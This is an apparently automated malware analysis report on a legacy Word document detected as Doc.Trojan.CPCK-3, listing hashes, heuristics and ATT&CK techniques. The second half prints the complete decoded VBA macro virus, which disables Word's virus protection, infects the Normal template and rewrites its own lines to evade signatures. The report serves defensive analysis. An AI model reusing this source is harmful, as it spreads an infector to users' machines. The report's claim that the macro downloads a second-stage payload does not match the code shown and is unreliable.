Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ce5a53b60c1b3128…

MALICIOUS

Office (OLE)

Size: 50.0 KB | Created: 1997-09-17 11:18:00 | Authoring application: Microsoft Word 8.0 | First seen: 2012-06-14
MD5: 703de6625e6b75ea7060b2c796302d22
SHA-1: 28c0ce600ff374eb1a84c61e5acfb30a64bd4add
SHA-256: ce5a53b60c1b3128ca3d69af5af516a479a097b17475ab2dcce26cfc10e6c042
Risk score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic; T1566.001 Spearphishing Attachment

The sample is a legacy Word document containing a VBA macro triggered by the Document_Close (AutoClose) event. The macro is designed to obfuscate its own actions and, as indicated by the ClamAV detection and its manipulation of VBA code modules, likely downloads and executes a second-stage payload. The document body itself contains only generic text unrelated to the malicious functionality.

Heuristics 4

  • ClamAV: Doc.Trojan.CPCK-3 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.CPCK-3
  • VBA macros detected (medium; 1 related finding; OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Close macro (high; OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2006 bytes
SHA-256: 403231ea78821944b523223386feb47440b07aae132a0fe48ad26ad43608bd4f

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Close()
PLM = GGR + AQR
On Error Resume Next
PAJ = SRI + VTB
Application.EnableCancelKey = 0
UIL = QBN + KGN
KC7 = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
OFG = SSM + VUE
Options.SaveNormalPrompt = 0
PVF = LCV + OAM
VR71 = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
CCR = GBG + IGU
Options.VirusProtection = 0
VIG = DDO + JJP
Options.ConfirmConversions = 0
HNE = EMB + KTF
If KC7 > 0 And VR71 > 0 Then GoTo LE96
RIG = UNN + JCM
If KC7 = 0 Then
PUS = ALU + JOL
Set VL56 = ActiveDocument.VBProject.VBComponents.Item(1)
LKH = IFB + FVB
SF81 = True
IIK = DKF + NLD
End If
UOL = ICR + KQN
If VR71 = 0 Then
SAE = BCH + CAL
Set VL56 = NormalTemplate.VBProject.VBComponents.Item(1)
OLS = BEO + JHD
UL53 = True
PUL = BQI + KKE
End If
HCM = DUC + JGT
If UL53 <> True And SF81 <> True Then GoTo LE96
QGO = FBA + HRG
If UL53 = True Then VL56.CodeModule.AddFromString ("Sub AutoClose()" & vbCr & ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(2, KC7 - 1))
FKF = HAK + ETM
If SF81 = True Then VL56.CodeModule.AddFromString ("Sub Document_Close()" & vbCr & NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, VR71 - 1))
QUH = LBN + JVC
With VL56.CodeModule
UNH = DKE + VCA
For x = 2 To (VL56.CodeModule.CountOfLines - 1) Step 2
HMU = LIS + SOP
.replaceline x, (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & " = " & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & " + " & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22)))
VHK = JPD + JLR
Next x
LJL = FNK + OTI
End With
GGD = LEM + HTK
LE96:
EPQ = NRD + REV
End Sub